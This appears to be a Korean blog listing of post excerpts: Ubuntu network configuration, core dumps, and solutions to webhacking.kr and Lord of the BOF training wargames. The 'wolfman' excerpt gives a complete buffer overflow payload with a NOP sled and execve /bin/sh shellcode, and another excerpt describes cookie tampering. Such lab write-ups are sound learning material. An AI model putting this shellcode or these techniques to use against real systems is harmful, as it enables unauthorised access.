Network 설정 vmware ubuntu가 쥬금.. 다시설정해보자 먼저sudo -s 권한 부여해서 vi /etc/network/interfaces에 들어가서 기존에 작성돼어있는 부분 밑에 추가로 작성한다 iface eth0 inet staticaddress 192.168.28.31netmask 255.255.255.0network 192.168.28.0broadcast 192.168.28.255gateway 192.168.28.1 dns-nameserver 8.8.8.8 라고 입력하고 vi /etc/resolv.conf에 dns를 추가한다nameserver 8.8.8.8 다하고 이더넷 재시작.. service networking restartubunt 14.04 버전에서 약간 오류가있어서 안된다고 알고있다..그냥 reb.. 더보기 orc->wolfman 문제다.goblin문제와 같지만 bufer hunter가 추가되어 버퍼를 비운다. 1. 환경변수 사용불가2. 카나리존재3. buffer를 비움 -> 버퍼내에 쉘코드 불가 goblin과 똑같은 방식으로 풀었다. buffer를 A로 44byte 채웠고, ret 4byte에 이동할 주소를 넣는다. 그리고 NOP로 채우고 쉘코드를 실행한다. 내 페이로드다./wolfman `python -c'print "A"*44+"\xe0\xfb\xff\xbf"+"\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'` 성공 love eyuna 더보기 core dump 생성 core dump(bash 내장명령어) 사이즈 확인 ulimit -a 기본값으로 core file size는 0..unlimited나 큰 사이즈로 변경하면 segment fault, bus error발생 시 core 파일이 생성된다. core파일이 생성되면 gdb -c core -q를 이용하여 분석가능 더보기 1 문제다. index.phps를 보란다.(phps는 소스가 보인다..) 대략 소스를 분석해보면첫번째 if는 eregi로 0~9가 아닐경우 cookie로 만들어진 user_lv를 1로 바꾼다두번째 if는 user_lv가 6보다 크거나 같을때 user_lv = 1로 만든다세번째 if는 user_lv가 5보다 클 때 solve를 보여준다. 5보다 커야하지만 6보다 크다면 1로만들어버리니까..약간의 센스문제다. 쿠키를 보니1이다. 이를 5보다는 크지만 6보다 크지않은 소수 5.5로 바꾸어보았다 굿 더보기 가입 webhacking.kr 첫 화면이다.가입페이지가 없다. 우클릭 후 view source를 해보면..쭈욱 뜨는데 하단쪽에 주석처리 돼있는 부분이 있다. 버튼을 감추었네하하 해당주소로 이동을하면 다 채웠는데 하단쪽에 decode me부분을 보아하니 무언가 encoding 돼 있다..base64로 보여서 디코딩 후 가입할 수 있었다. 더보기 이전 1 2 3 4 5 ··· 7 다음
